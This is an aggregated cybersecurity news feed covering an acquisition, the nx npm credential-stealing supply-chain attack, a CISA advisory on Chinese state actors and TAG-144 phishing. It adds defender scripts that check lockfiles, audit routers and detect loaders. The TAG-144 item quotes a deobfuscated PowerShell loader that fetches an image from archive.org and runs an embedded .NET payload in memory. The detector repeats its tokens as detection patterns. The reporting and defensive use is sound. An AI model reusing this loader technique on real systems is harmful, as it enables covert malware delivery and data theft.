• Global cybersecurity leader CrowdStrike announced its intention to acquire Onum, a pioneer in real-time telemetry pipeline management, in a deal reportedly valued at $290 million.

    The acquisition, unveiled Wednesday, aims to significantly enhance CrowdStrike’s Falcon Next-Gen SIEM platform, transforming it into a more powerful data foundation for modern, AI-driven security operations.

    The integration of Onum’s technology is set to address a critical challenge in security operations: managing and processing vast amounts of data efficiently. Onum’s platform acts as both a high-speed data pipeline and an intelligent filter, streaming refined, high-quality data directly into the Falcon platform.

    “Our Next-Gen SIEM is the engine that powers the modern SOC, and data is the fuel that makes the engine run,” said George Kurtz, CEO and founder of CrowdStrike.

    “Onum is both a pipeline and a filter, which will stream high-quality, filtered data directly into the platform to drive autonomous cybersecurity at scale. This is how we stop breaches at the speed of AI while giving customers complete control over their entire data ecosystem.”

    Built on a proprietary in-memory architecture, Onum’s technology offers significant performance advantages. The company claims it can deliver up to five times more events per second than its nearest competitor.

    By enabling “in-pipeline analysis,” Onum allows for AI-powered detections to occur at the data source, even before the data enters the Falcon platform.

    This innovative approach promises up to 70 percent faster incident response times with 40 percent less ingestion overhead. Furthermore, its smart filtering capabilities can reduce data storage costs by as much as 50 percent.

    Historically, migrating data into a new SIEM has been a major bottleneck for security teams, often requiring complex third-party tools and significant effort.

    This acquisition is designed to eliminate that friction by making data streaming and in-pipeline detection a native function within the Falcon platform, accelerating SOC transformation for customers.

    “Onum was founded on the belief that pipelines should do more than transport data, they should transform data into real-time intelligence,” said Pedro Castillo, founder and CEO of Onum. “By joining CrowdStrike, we can deliver this vision at unprecedented scale to accelerate SOC transformation on a global scale.”

    The acquisition positions CrowdStrike to further solidify its Falcon platform as the central operating system for cybersecurity, expanding its capabilities beyond core security into broader IT observability. The transaction is subject to customary closing conditions.

      The post CrowdStrike Set to Acquire Onum in $290 Million Deal to Enhance Falcon Next-Gen SIEM appeared first on Cyber Security News.


    1. Experts have described methods for mimicking the strategies of the advanced persistent threat (APT) group Scattered Spider in a recent in-depth analysis by cybersecurity company Lares, allowing enterprises to strengthen their defenses through adversarial cooperation. Lares specializes in threat emulation, replicating real-world tactics, techniques, and procedures (TTPs) observed in cybercriminal activities. By dissecting incidents like […]

      The post New Research Explores Emulating Scattered Spider Tactics in Real-World Scenarios appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


    2. PromptLock, a novel ransomware strain discovered by the ESET Research team, marks the first known instance of malware harnessing a local large language model to generate its malicious payload on the victim’s machine. Rather than carrying pre-compiled attack logic, PromptLock ships with hard-coded prompts that instruct a locally hosted OpenAI gpt-oss:20b model—accessed via the Ollama […]

      The post First AI-Powered Ransomware “PromptLock” Uses OpenAI gpt-oss-20b for Encryption appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


    3. The maintainers of the nx build system have alerted users to a supply chain attack that allowed attackers to publish malicious versions of the popular npm package and other auxiliary plugins with data-gathering capabilities. “Malicious versions of the nx package, as well as some supporting plugin packages, were published to npm, containing code that scans the file system, collects credentials,


    4. Over 1,400 developers discovered today that a malicious post-install script in the popular NX build kit silently created a repository named s1ngularity-repository in their GitHub accounts. 

      This repository contains a base64-encoded dump of sensitive data: wallet files, API keys, .npmrc credentials, environment variables, and more, harvested directly from developers’ file systems.

      Key Takeaways
      1. Malware in the NX build tool steals credentials and creates GitHub repos.
      2. Targets Claude and Gemini CLIs for advanced data exfiltration.
      3. Delete suspicious repos, update NX, and rotate secrets urgently.

      AI-Assisted Data Exfiltration

      Semgrep reports that attackers leveraged the NX post-install hook via a file named telemetry.js to execute malicious code immediately after package installation. 

      The malware first collects environment variables and attempts to locate a GitHub authentication token via the GitHub CLI. Armed with credentials, it then creates a public repository such as s1ngularity-repository-0 and commits the stolen data in results.b64.

      What makes this campaign particularly novel is its integration with Claude Code CLI or Gemini CLI. If either AI-powered CLI is present, the malware issues a carefully crafted prompt to conduct fingerprintable filesystem scans:

      NX Build Tool Hacked

      This AI-driven approach offloads the bulk of signature-based filesystem enumeration to the LLM, complicating traditional malware detection.

      Affected NX Versions and Mitigations

      • @nx/devkit 21.5.0, 20.9.0
      • @nx/enterprise-cloud 3.2.0
      • @nx/eslint 21.5.0
      • @nx/key 3.2.0
      • @nx/node 21.5.0, 20.9.0
      • @nx/workspace 21.5.0, 20.9.0
      • @nx 20.9.0–20.12.0, 21.5.0–21.8.0

      Developers using any impacted versions should immediately run:

      or inspect lockfiles for vulnerable dependencies. 

      • Search for unauthorized repositories.
      • Delete any s1ngularity-repository* you find.
      • Update NX to safe version 21.4.1 (vulnerable versions removed from npm).
      • Rotate all exposed secrets: GitHub tokens, npm credentials, SSH keys, environment variables.
      • Remove malicious shutdown directives in shell startup files (e.g., .bashrc).

      As the incident unfolds, organizations are urged to monitor repository creations and enforce strict post-installation auditing.
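The mitigation steps above (check lockfiles for the listed versions, look for attacker-created repositories, inspect shell startup files) can be scripted. The following is an added example written for this summary; it is not code from the article, from Semgrep or from the nx project. It assumes an npm lockfile in the v2/v3 layout (the "packages" map), takes the package names and versions exactly as the article lists them (including the core package written as "@nx"), and matches repositories on the "s1ngularity-repository" prefix the article reports. Every input below is constructed for illustration.

```python
"""Defender-side checks for the nx supply-chain incident described above.

Added example, not code from the article or the nx project. Assumptions:
  * package-lock.json uses the npm lockfile v2/v3 "packages" map;
  * affected names/versions are exactly those listed in the article;
  * attacker-created repositories start with "s1ngularity-repository".
All sample inputs at the bottom are constructed.
"""
import json
import re

# Affected versions as listed in the article: exact versions per package,
# and inclusive (major, minor, patch) ranges for the core "@nx" entry.
AFFECTED_EXACT = {
    "@nx/devkit": {"21.5.0", "20.9.0"},
    "@nx/enterprise-cloud": {"3.2.0"},
    "@nx/eslint": {"21.5.0"},
    "@nx/key": {"3.2.0"},
    "@nx/node": {"21.5.0", "20.9.0"},
    "@nx/workspace": {"21.5.0", "20.9.0"},
}
AFFECTED_RANGES = {
    "@nx": [((20, 9, 0), (20, 12, 0)), ((21, 5, 0), (21, 8, 0))],
}


def parse_version(version):
    """Turn '21.5.0' into (21, 5, 0); None for non-numeric versions."""
    match = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)", version)
    return tuple(int(x) for x in match.groups()) if match else None


def is_affected(name, version):
    """True if (name, version) is in the article's affected list."""
    if version in AFFECTED_EXACT.get(name, set()):
        return True
    parsed = parse_version(version)
    if parsed is None:
        return False
    return any(lo <= parsed <= hi for lo, hi in AFFECTED_RANGES.get(name, []))


def scan_lockfile(lock_json):
    """Return sorted [(package, version)] for every affected lockfile entry.

    Keys in "packages" look like "node_modules/@nx/devkit" (possibly nested
    under another node_modules); the package name follows the last
    "node_modules/" segment. The "" key is the root project and is skipped.
    """
    findings = []
    for path, meta in json.loads(lock_json).get("packages", {}).items():
        if not path:
            continue
        name = path.rsplit("node_modules/", 1)[-1]
        version = meta.get("version", "")
        if is_affected(name, version):
            findings.append((name, version))
    return sorted(findings)


def suspicious_repos(repo_names, prefix="s1ngularity-repository"):
    """Filter repository names (e.g. the output of `gh repo list`) to those
    matching the naming pattern the article attributes to the malware."""
    return sorted(name for name in repo_names if name.startswith(prefix))


def suspicious_startup_lines(rc_text):
    """Return (line_no, line) pairs in a shell startup file that invoke
    shutdown, the directive the article says to remove from e.g. .bashrc."""
    return [(no, line.strip()) for no, line in enumerate(rc_text.splitlines(), 1)
            if re.search(r"\bshutdown\b", line)]


# Constructed sample inputs (not real project data) ------------------------
SAMPLE_LOCK = json.dumps({
    "name": "demo", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo"},
        "node_modules/@nx": {"version": "20.10.0"},
        "node_modules/@nx/devkit": {"version": "21.5.0"},
        "node_modules/@nx/workspace": {"version": "21.4.1"},
        "node_modules/@nx/key": {"version": "3.2.0"},
        "node_modules/left-pad": {"version": "1.3.0"},
    },
})
SAMPLE_REPOS = ["my-app", "s1ngularity-repository-0", "dotfiles"]
SAMPLE_BASHRC = "export PATH=$HOME/bin:$PATH\nalias ll='ls -la'\nsudo shutdown -h 0\n"

if __name__ == "__main__":
    print("affected packages:", scan_lockfile(SAMPLE_LOCK))
    print("suspicious repos :", suspicious_repos(SAMPLE_REPOS))
    print("startup lines    :", suspicious_startup_lines(SAMPLE_BASHRC))
```

In practice the lockfile check runs over each repository's committed package-lock.json, the repository check over the output of the GitHub CLI, and the startup-file check over the dotfiles of every developer who installed the package; a hit in any of the three is the cue to rotate the secrets listed in the article.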


      The post NX Build Tool Hacked with Malware That Checks for Claude or Gemini to Find Wallets and Secrets appeared first on Cyber Security News.


    5. Akamai researchers evaluated Microsoft’s patch for the BadSuccessor vulnerability (CVE-2025-53779) to determine its scope and limitations. While the update effectively blocks the original direct escalation path, the core mechanics of BadSuccessor remain exploitable under specific conditions. In this article, we examine how attackers can continue to leverage delegated Managed Service Accounts (dMSAs) for credential theft […]

      The post BadSuccessor After Patch: Using dMSAs for Credential Theft and Lateral Movement in AD appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


    6. The U.S. Cybersecurity and Infrastructure Security Agency (CISA), alongside the NSA, FBI, and a broad coalition of international partners, has released a comprehensive cybersecurity advisory detailing a widespread espionage campaign by People’s Republic of China (PRC) state-sponsored actors targeting critical networks worldwide.

      The 37-page report, “Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System,” outlines the tactics, techniques, and procedures (TTPs) used by these advanced persistent threat (APT) groups to infiltrate and maintain long-term access to telecommunications, government, transportation, and military infrastructure.

      Key Takeaways
      1. Guide uses MITRE ATT&CK/D3FEND to counter Chinese APTs exploiting CVEs.
      2. Enforce management isolation, disable risky features, and require strong authentication.
      3. Prioritize patching, enable detailed logging, and coordinate threat hunting.

      According to the advisory, these cyber actors, tracked by industry groups under names like “Salt Typhoon” and “GhostEmperor”, have been operating since at least 2021.

      The operation aims to steal data that allows Chinese intelligence services to track the communications and movements of their targets around the globe.

      The advisory explicitly links the activity to several Chinese technology companies, including Sichuan Juxinhe Network Technology Co. Ltd., which allegedly provides services to China’s military and intelligence arms.

      A key finding of the investigation is that the actors are not relying on zero-day exploits. Instead, they are having “considerable success” by exploiting publicly known and often unpatched common vulnerabilities and exposures (CVEs).

      The report urges network defenders to prioritize patching several specific vulnerabilities, including those affecting Cisco, Palo Alto Networks, and Ivanti devices.

      CVE | Vendor/Product | Details
      CVE-2024-21887 | Ivanti Connect Secure and Ivanti Policy | Command injection vulnerability, often chained with CVE-2023-46805 for authentication bypass.
      CVE-2024-3400 | Palo Alto Networks PAN-OS GlobalProtect | Allows for unauthenticated remote code execution (RCE) via arbitrary file creation that leads to OS command injection on firewalls with specific GlobalProtect configurations.
      CVE-2023-20273 | Cisco IOS XE | A post-authentication command injection and privilege escalation flaw in the web management UI, frequently chained with CVE-2023-20198 to achieve root-level code execution.
      CVE-2023-20198 | Cisco IOS XE | An authentication bypass vulnerability in the web UI that enables the creation of unauthorized administrative accounts.
      CVE-2018-0171 | Cisco IOS and IOS XE | A remote code execution vulnerability related to the Smart Install feature.

      The threat actors’ methodology involves a “living off the land” approach. After gaining initial access by exploiting a vulnerable, internet-facing router or firewall, they use the device’s own native tools and capabilities to burrow deeper into the network.

      Techniques include modifying access control lists, capturing network traffic to steal credentials, and using on-box Linux containers like Cisco’s Guest Shell to hide their tools and activities from standard monitoring.

      “These actors often modify routers to maintain persistent, long-term access to networks,” the advisory states. They create covert tunnels, re-route traffic to their own infrastructure, and meticulously clear logs to cover their tracks, making detection extremely difficult.

      The joint advisory represents a massive international effort, with contributing agencies from Australia, Canada, the United Kingdom, New Zealand, Germany, Japan, Italy, and Poland, among others. It provides detailed threat-hunting guidance, urging organizations to:

      • Monitor for unauthorized configuration changes, unexpected network tunnels (GRE, IPsec), and suspicious use of packet capture tools.
      • Audit virtualized containers on network devices for unauthorized activity.
      • Verify firmware and software integrity against vendor-provided hashes.
      • Implement robust logging and forward logs to a secure, centralized server.

      Mitigation strategies focus on hardening network infrastructure. Recommendations include disabling unused ports and services, implementing strict management-plane isolation, enforcing strong, unique credentials, and disabling legacy protocols like Telnet and SNMPv1/v2 in favor of secure, modern alternatives.
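Several of the hunting and hardening points above (legacy Telnet and SNMPv1/v2 management, unexpected GRE or IPsec tunnels, on-box container hosting, exposure of the web management UI, logs that never leave the device) are visible in a device's running configuration. The following audit is an added example written for this summary, not material from the advisory, CISA or Cisco. It parses a Cisco IOS / IOS XE style running-config exported as text; the command names are standard IOS syntax, the finding categories are this example's own, and both sample configurations are constructed.

```python
"""Running-config audit for hunting/hardening points in the advisory summary.

Added example, not from the advisory or any vendor. Works on a Cisco IOS /
IOS XE style running-config dumped as text. Checks:
  * "transport input" on vty lines allowing telnet (or "all");
  * "snmp-server community" lines (SNMPv1/v2c community strings);
  * Tunnel interfaces, reporting mode and destination for review;
  * "iox" (IOx application hosting, the prerequisite for Guest Shell);
  * "ip http server" / "ip http secure-server" (the web management UI);
  * absence of any "logging host" (no off-box syslog destination).
Sample configurations below are constructed; 203.0.113.0/24 is a
documentation range.
"""


def split_blocks(config_text):
    """Group a running-config into (header, [body lines]) blocks.

    Top-level (unindented) lines start a block; indented lines belong to the
    preceding block. Comment lines beginning with '!' are dropped.
    """
    blocks = []
    for raw in config_text.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        if raw[0].isspace():
            if blocks:
                blocks[-1][1].append(raw.strip())
        else:
            blocks.append((raw.strip(), []))
    return blocks


def audit_config(config_text):
    """Return a sorted list of (category, evidence) findings for one device."""
    findings = []
    blocks = split_blocks(config_text)
    headers = [header for header, _ in blocks]

    for header, body in blocks:
        # Cleartext management: telnet still accepted on a vty line
        if header.startswith("line vty"):
            for line in body:
                if line.startswith("transport input") and ({"telnet", "all"} & set(line.split())):
                    findings.append(("legacy-protocol", f"{header}: {line}"))
        # SNMPv1/v2c community strings; SNMPv3 uses snmp-server group/user
        if header.startswith("snmp-server community"):
            findings.append(("legacy-protocol", header))
        # Every tunnel interface is reported so an analyst can confirm it is
        # expected; IOS defaults an unspecified tunnel mode to GRE over IP.
        if header.startswith("interface Tunnel"):
            mode = next((line for line in body if line.startswith("tunnel mode")),
                        "tunnel mode gre ip (default)")
            dest = next((line for line in body if line.startswith("tunnel destination")),
                        "tunnel destination <unset>")
            findings.append(("tunnel", f"{header}: {mode}; {dest}"))
        # IOx enabled: Guest Shell containers can be hosted on this device
        if header == "iox":
            findings.append(("container-host", header))
        # Web UI exposed: the surface targeted by CVE-2023-20198/20273
        if header in ("ip http server", "ip http secure-server"):
            findings.append(("web-ui", header))

    # Logs must be forwarded off-box to survive an actor clearing them locally
    if not any(h.startswith("logging host") for h in headers):
        findings.append(("logging", "no 'logging host' configured; logs stay on the device"))
    return sorted(findings)


# Constructed sample: a device exhibiting several of the advisory's concerns
SAMPLE_CONFIG = """
hostname edge-rtr-1
!
iox
!
ip http server
ip http secure-server
!
snmp-server community public RO
!
interface Tunnel7
 ip address 10.99.99.1 255.255.255.252
 tunnel source GigabitEthernet0/0
 tunnel destination 203.0.113.77
 tunnel mode gre ip
!
line vty 0 4
 transport input telnet ssh
!
end
"""

# Constructed sample: the same checks pass on a hardened device
HARDENED_CONFIG = """
hostname edge-rtr-2
logging host 10.0.0.5
snmp-server group NETMON v3 priv
line vty 0 4
 transport input ssh
end
"""

if __name__ == "__main__":
    for category, evidence in audit_config(SAMPLE_CONFIG):
        print(f"{category:16} {evidence}")
```

Run across a fleet, the output is a per-device list to reconcile against change records: a tunnel nobody requested or an `iox` line on a router that never hosted applications is exactly the kind of unauthorized configuration change the advisory asks defenders to look for.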

      The advisory serves as a critical resource for network defenders, providing not only strategic guidance but also specific indicators of compromise, such as IP addresses used by the actors and YARA rules to detect their custom malware.

      CISA and its partners strongly urge organizations, especially in the telecommunications sector, to use the guide to proactively hunt for malicious activity and fortify their defenses against this persistent global threat.


      The post CISA Publish Hunting and Mitigation Guide to Defend Networks from Chinese State-Sponsored Actors appeared first on Cyber Security News.


    7. Microsoft Threat Intelligence has detailed the evolving tactics of the financially motivated threat actor Storm-0501, which has transitioned from traditional on-premises ransomware deployments to sophisticated cloud-based operations. Unlike conventional ransomware that relies on endpoint encryption malware and subsequent decryption key negotiations, Storm-0501 exploits cloud-native capabilities to exfiltrate massive data volumes, obliterate backups, and enforce ransom […]

      The post Microsoft Unveils Storm-0501’s Cloud-Based Ransomware Deployment Tactics appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


    8. The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) announced a fresh round of sanctions against two individuals and two entities for their role in the North Korean remote information technology (IT) worker scheme to generate illicit revenue for the regime’s weapons of mass destruction and ballistic missile programs. “The North Korean regime continues to target American


    9. Over the past year, a shadowy threat actor known as TAG-144—also tracked under aliases Blind Eagle and APT-C-36—has intensified operations against South American government institutions.

      First observed in 2018, this group has adopted an array of commodity remote access trojans (RATs) such as AsyncRAT, REMCOS RAT, and XWorm, often delivered through highly targeted spearphishing campaigns masquerading as official judicial or tax notifications.

      In mid-2025, Recorded Future analysts noted a significant uptick in activity, with five distinct clusters deploying new infrastructure and exploiting legitimate internet services to stage malware payloads.

      Initial access typically leverages compromised or spoofed email accounts from local government agencies, luring users into opening malicious documents or SVG attachments.

      These attachments often contain embedded JavaScript that, when executed, retrieves a second-stage loader from services like Paste.ee or Discord’s CDN.

      Recorded Future researchers identified numerous compromised Colombian government email addresses used to send deceptive legal summonses, illustrating the adversary’s ability to blend social engineering with technical subterfuge.

      Phishing pages linked to Cluster 4 (Source – Recordedfuture)

      The impact of TAG-144’s campaigns has been most severe in Colombia’s federal and municipal agencies, where exfiltration of credentials and sensitive data poses both espionage and financial extortion risks.

      Despite sharing core tactics across clusters—dynamic DNS domains, open-source RATs, and stolen crypters—the group’s evolving use of steganography and domain generation algorithms (DGAs) marks a notable shift toward more resilient operations.

      Recorded Future analysts noted that this evolution not only complicates traditional defenses but also underscores the blurred line between cybercrime and state-level espionage.

      Infection Mechanism and Steganographic Payload Extraction

      One of TAG-144’s most sophisticated techniques involves embedding a Base64-encoded .NET assembly within the pixel data of a benign JPEG image hosted on Archive[.]org.

      Payload hosted on archive[.]org URL (Source – Recordedfuture)

      Upon execution of the initial PowerShell script, the loader scans for a predefined byte marker before extracting and invoking the payload directly in memory, bypassing disk writes and evading antivirus detection.

      For example, the deobfuscated PowerShell segment responsible for this process appears as:

      $tormodont = 'https://archive.org/download/universe-.../universe.jpg'
      $sclere = New-Object System.Net.WebClient
      $sclere.Headers.Add('User-Agent','Mozilla/5.0')
      $sorority = $sclere.DownloadData($tormodont)
      # Identify marker and extract embedded bytes
      $splenoncus = $sorority[$markerIndex..($sorority.Length - 1)]
      $stream = New-Object IO.MemoryStream
      $stream.Write($splenoncus, 0, $splenoncus.Length)
      $bitmap = [Drawing.Bitmap]::FromStream($stream)
      # Reconstruct payload from pixel data
      foreach ($y in 0..($bitmap.Height-1)) {
        foreach ($x in 0..($bitmap.Width-1)) {
          $color = $bitmap.GetPixel($x,$y)
          $bytesList.Add($color.R); $bytesList.Add($color.G); $bytesList.Add($color.B)
        }
      }
      $payloadBytes = [Convert]::FromBase64String($bytesList[4..($length+3)] -join '')
      [Reflection.Assembly]::Load($payloadBytes).EntryPoint.Invoke($null,$args)

      This in-memory injection, coupled with dynamic domain resolution—often leveraging services like duckdns.org and noip.com—ensures that the RAT’s command-and-control infrastructure remains agile and difficult to trace.

      By avoiding traditional executable downloads and utilizing steganography, TAG-144 demonstrates an advanced understanding of both detection evasion and asset staging, posing a persistent threat to government networks across the region.
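Because the loader described above never writes an executable to disk, the most reliable place to catch it is the script text itself, for example the ScriptBlockText field that PowerShell script block logging records (Event ID 4104). The following heuristic is an added example written for this summary; it is not part of the Recorded Future report. The indicator list, weights and threshold are this example's own choices, and the sample script fragments are constructed: they contain the tokens of the pattern (image download, pixel walk, Base64 decode, reflective assembly load) without performing it.

```python
"""Score PowerShell script text for the image-borne in-memory loader chain
described in the TAG-144 summary: fetch an image, walk its pixels, decode
Base64, load the result with System.Reflection.Assembly and invoke it.

Added example, not from the report. Intended input is script text such as
the ScriptBlockText of PowerShell Operational log Event ID 4104. Indicator
weights and the threshold are this example's own; samples are constructed.
"""
import re

# (name, case-insensitive regex, weight). Each token is common on its own in
# benign scripts; the score rewards the whole chain occurring together.
INDICATORS = [
    ("remote-fetch",    r"\bDownloadData\b|\bDownloadString\b|Invoke-WebRequest", 1),
    ("image-decode",    r"Drawing\.Bitmap\]::FromStream|System\.Drawing\.Bitmap", 2),
    ("pixel-walk",      r"\.GetPixel\(", 2),
    ("b64-payload",     r"\[Convert\]::FromBase64String", 1),
    ("reflective-load", r"\[Reflection\.Assembly\]::Load|System\.Reflection\.Assembly\]::Load", 3),
    ("entrypoint-run",  r"\.EntryPoint\.Invoke\(", 2),
    ("archive-host",    r"archive\.org/download/", 1),
]
# pixel-walk + reflective-load + entrypoint-run alone reach the threshold;
# ordinary image processing or a plain Base64 decode stay well below it.
THRESHOLD = 7


def score_script(text):
    """Return (score, [matched indicator names]) for one script body."""
    hits = [name for name, pattern, _ in INDICATORS if re.search(pattern, text, re.I)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def is_suspicious(text, threshold=THRESHOLD):
    """True when the combined indicator weight meets the threshold."""
    return score_script(text)[0] >= threshold


def triage(script_blocks):
    """Rank (record_id, script_text) pairs by score, highest first."""
    scored = [(record_id, *score_script(text)) for record_id, text in script_blocks]
    return sorted(scored, key=lambda row: row[1], reverse=True)


# Constructed samples: token-bearing fragments, not working scripts ----------
LOADER_LIKE = r"""
$d = $wc.DownloadData('https://archive.org/download/example-item/example.jpg')
$img = [Drawing.Bitmap]::FromStream($ms)
$px = $img.GetPixel(0,0)
$bytes = [Convert]::FromBase64String($s)
[Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null,$null)
"""
BENIGN_THUMBNAIL = r"""
Add-Type -AssemblyName System.Drawing
$img = [System.Drawing.Bitmap]::FromFile('C:\photos\in.jpg')
$p = $img.GetPixel(10,10)
$img.Save('C:\photos\out.png')
"""
BENIGN_DOWNLOAD = "Invoke-WebRequest -Uri https://example.com/report.csv -OutFile report.csv"
BENIGN_B64 = "$cfg = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($env:CONFIG_B64))"

SAMPLE_EVENTS = [
    ("evt-1", LOADER_LIKE),
    ("evt-2", BENIGN_THUMBNAIL),
    ("evt-3", BENIGN_DOWNLOAD),
    ("evt-4", BENIGN_B64),
]

if __name__ == "__main__":
    for record_id, score, hits in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if score >= THRESHOLD else "ok"
        print(f"{record_id} score={score:2d} {flag:10} {', '.join(hits)}")
```

The weighting deliberately puts the most weight on the reflective load and entry-point invocation, since those are what turn an image download into code execution; a thumbnail generator scores on image handling alone and a configuration script on the Base64 decode alone, and neither approaches the threshold.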


      The post TAG-144 Actors Attacking Government Entities With New Tactics, Techniques, and Procedures appeared first on Cyber Security News.
